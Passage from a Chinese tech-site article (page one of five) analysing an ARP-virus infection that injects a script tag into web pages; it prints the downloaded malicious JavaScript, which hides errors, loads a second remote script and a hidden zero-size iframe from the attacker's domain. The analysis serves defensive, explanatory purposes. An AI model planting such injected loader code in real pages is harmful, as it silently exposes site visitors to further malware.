| 网站首页 | 资讯 | 技术中心 | 下载 | 图片 | 影视一区 | 影视二区 | 影视三区 | 迅雷电影 | 电视 | 电子书 | 论文 | 青岛电影网 | 
您现在的位置: 电脑之家 DNZJ.NET >> 技术中心 >> 安全技术 >> 杀毒技术 >> 文章正文
  arp病毒利用的Javascript技术(1) - arp病毒            【字体:
arp病毒利用的Javascript技术(1) - arp病毒
作者:佚名    文章来源:豆豆技术网    点击数:    更新时间:2008-5-6    

  本文的目的是探讨JS相关技术,并不是以杀毒为主要目的,杀毒只是为讲解一些JS做铺垫的,呵呵,文章有点长,倒杯咖啡或者清茶慢慢看,学习切勿急躁!

  最近公司的网络中了这两天闹的很欢的ARP病毒,导致大家都无法上网,给工作带来了很大的不方便,在这里写下杀毒的过程,希望对大家能有帮助!

  现象:

  打开部分网页显示为乱码,好像是随机的行为,但是看似又不是,因为它一直在监视msn.com,呵呵,可能和微软有仇吧,继续查看源代码,发现头部有一个js文件链接----<script src=http://9-6.in/n.js></script>;

  来源:

  经过一番网络搜索,发现这个域名是印度域名,而IP地址却是美国的,而且域名的注册日期是7月25日,看来一切都是预谋好了的,还是不管这个了,先解决问题吧;

  分析:

  1、先把(http://9-6.in/n.js)这个JS文件下载下来,代码如下:

  document.writeln("<script>window.onerror=function(){return true;}</script>");
  document.writeln("<script src="http://9-6.in/S368/NewJs2.js"></script>");
  document.writeln("<script>");
  document.writeln("function StartRun(){");
  document.writeln("var Then = new Date() ");
  document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)");
  document.writeln("var cookieString = new String(document.cookie)");
  document.writeln("var cookieHeader = "Cookie1=" ");
  document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)");
  document.writeln("if (beginPosition != -1){ ");
  document.writeln("} else ");
  document.writeln("{ document.cookie = "Cookie1=POPWINDOS;expires="+ Then.toGMTString() ");
  document.writeln("document.write('<iframe width=0 height=0 src="http://9-6.IN/s368/T368.htm"></iframe>');");
  document.writeln("}");
  document.writeln("}");
  document.writeln("StartRun();");
  document.writeln("</script>")

  其中第一句window.onerror=function(){return true;}就先把JS错误屏蔽掉,真够狠的,呵呵,不这样怎么隐藏自己呢,哈哈!然后还有个JS文件 http://9-6.in/S368/NewJs2.js,先继续往下看,找到StartRun();运行一个函数,函数的主要作用是写COOKIE,日期为保存一天,然后还用隐藏框架加载了一个文件(http://9-6.IN/s368/T368.htm),其余就没有什么特别的了;

12345下一页

[1] [2] [3] [4] [5] 下一页

文章录入:admin    责任编辑:admin 
  • 上一篇文章:

  • 下一篇文章:
  • 发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    最新热点 最新推荐 相关文章
    RAR制作---自定义图标+多个文
    新版Google Earth 4.3版探秘
    利用WinRAR软件制作个性安装
    教你压缩RAR文件时自动添加注
    Word 2007 使用SmartArt工具
    从SharePoint列表往Excel导入
    错位机皇之争!佳能1Ds MarkI
    像素高更要画质好!佳能1Ds M
    巅峰画质标准!佳能1Ds Mark
    全幅!尼康D3佳能1Ds MARK I
      网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)
    您好!我是网虫,欢迎来到电脑之家做客,愿您在这里与知音相遇。建议使用 IE 6.0 以上,1024*768 分辨率全屏观看。
    设为首页加入收藏联系站长友情链接版权申明后台管理
    备案编号:鲁ICP备07010766号